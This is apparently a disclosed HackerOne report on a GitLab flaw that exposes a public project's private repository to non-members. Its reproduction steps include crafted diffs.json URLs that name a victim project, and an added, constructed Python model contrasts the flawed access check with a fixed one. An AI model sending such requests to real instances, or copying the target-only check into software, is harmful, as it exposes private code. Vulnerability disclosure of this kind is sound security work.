Source Code Disclosure of Private Repo in Public/Internal Project
**[HackerOne report #455673](https://hackerone.com/reports/455673)** by ngalog on 2018-12-05:
**Summary:**
One of the very unique features of GitLab is that it allows you to adjust the permissions of each separate part of your project. Consider this setting: a public project with a private repo.
Like in this screenshot
The owner of the project could be secretly developing something in the repository while keeping the rest of the project public.
However, there is a way to bypass this protection and still allow a non-member of the project to view the source code of the repo.
## Steps To Reproduce (Quick):
- Log in and visit [here](https://gitlab.com/ashleyjohnson/personal-project-with-private-source-code) to confirm you can't see the repo -- the project id is `9769102`
- Visit one of the projects you own and open `https://gitlab.com/{project_name_space}/merge_requests/new/diffs.json`. If you see `{"html":"\u003cdiv class=\"nothing-here-block\"\u003e\nThis merge request cannot be created.\n\u003c/div\u003e\n"}` in the response, proceed; if not, create at least one file in that project first
- Then append this query string to the URL: `?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=9769102&merge_request%5Bsource_branch%5D=master&merge_request%5Btarget_project_id%5D=124124124&merge_request%5Btarget_branch%5D=master`
- Now you are looking at the source code for my private repo in project `9769102`
## Slow way to reproduce:
- Create a project with a config like this
- Create some files inside
- Log in as another user and visit `https://gitlab.com/{project_namespace_that_you_own}/merge_requests/new/diffs.json?utf8=%E2%9C%93&merge_request[source_project_id]={victim_project_id}&merge_request[source_branch]=master&merge_request[target_project_id]=1294819248&merge_request[target_branch]=master`
- Source code disclosure!
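The root cause in both reproduction paths is that the new-merge-request diff endpoint renders the *source* project's repository while only authorizing against the *target* project. The following is an added, constructed model of that check (not the report's material and not GitLab's code); the access-level strings, project ids, user names and `check_source` switch are assumptions for illustration.

```python
from dataclasses import dataclass, field

# Constructed model of per-feature access levels in a GitLab-style project.
DISABLED, PRIVATE, ENABLED = "disabled", "private", "enabled"


@dataclass
class Project:
    id: int
    public: bool                  # project-level visibility
    repository_access: str        # per-feature level for the repository
    members: set = field(default_factory=set)  # user names with membership

    def can_read_repository(self, user: str) -> bool:
        """Everyone may read the repo only when the project is public AND the
        repository feature is 'enabled'; 'private' limits it to members even
        inside a public project (the setting the report targets)."""
        if self.repository_access == DISABLED:
            return False
        if user in self.members:
            return True
        return self.public and self.repository_access == ENABLED


def authorize_new_mr_diffs(user, source, target, check_source=True):
    """Decide whether `user` may render new-merge-request diffs for
    target <- source. With check_source=False only the target is checked,
    which is the weak behaviour described above: the diff body comes from
    the source repository, so its access level must be enforced too."""
    if not target.can_read_repository(user):
        return False
    if check_source and not source.can_read_repository(user):
        return False
    return True


def demo():
    # Constructed scenario mirroring the report: project 9769102 is public but
    # its repository is members-only; 124124124 is the requester's own project.
    victim = Project(9769102, public=True, repository_access=PRIVATE, members={"owner"})
    own = Project(124124124, public=False, repository_access=ENABLED, members={"guest"})
    public_src = Project(1, public=True, repository_access=ENABLED)  # legitimate fork case
    return {
        "weak_nonmember": authorize_new_mr_diffs("guest", victim, own, check_source=False),
        "fixed_nonmember": authorize_new_mr_diffs("guest", victim, own),
        "fixed_member": authorize_new_mr_diffs("owner", victim, victim),
        "fixed_public_source": authorize_new_mr_diffs("guest", public_src, own),
    }
```

The `fixed_public_source` case shows that checking the source repository does not break ordinary cross-project merge requests from readable repositories.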
## Impact
Source code disclosure of a private repo in a public project.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [publicWithPrivateRepo.PNG](https://h1.sec.gitlab.net/a/455673/385604/publicWithPrivateRepo.PNG)